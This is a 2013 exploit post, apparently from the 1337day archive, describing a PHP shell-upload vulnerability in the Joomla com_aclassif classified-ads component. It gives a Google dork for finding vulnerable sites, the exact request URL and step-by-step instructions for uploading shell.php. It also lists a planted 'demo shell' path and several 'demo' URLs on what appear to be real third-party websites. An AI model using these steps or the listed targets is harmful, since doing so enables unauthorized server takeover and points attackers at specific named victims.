-----------------------------------------------------------
Joomla Component com_aclassif shell upload Vulnerability
-----------------------------------------------------------
#####
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"index.php?option=com_aclassif"
#
# Tested on : Windows 7 , Backtrack 5r3
####
#=> Exploit Info :
------------------
# The attacker can upload any file/shell .php
------------------
#=> Exploit :
------------------
http://localhost/index.php?option=com_aclassif&option=com_aclassif&ct=wlkm_repl&md=add_form&replid=917&fblg=1
Put all the information & Submit attachment file => upload shell.php
Then Submit Ad
You will see your shell path => Attachment file: (.php, 96Kb)
#=> Demo Shell: http://ardwatalab.net/ara/components/com_aclassif/photos/mtmd4332.php
------------------------------
#=> Demos :
http://www.almondsoft.com/jm/index.php?option=com_aclassif&option=com_aclassif&ct=wlkm_repl&md=add_form&replid=917&fblg=1
http://ardwatalab.net/ara/index.php/ar/index.php?option=com_aclassif&option=com_aclassif&ct=wlkm_repl&md=add_form&replid=917&fblg=1
http://www.bonanza.org//index.php?option=com_aclassif&option=com_aclassif&ct=wlkm_repl&md=add_form&replid=917&fblg=1
------------------------------
# 039A881F5C237B47 1337day.com [2013-07-28] DA892FDCCF7FF93C #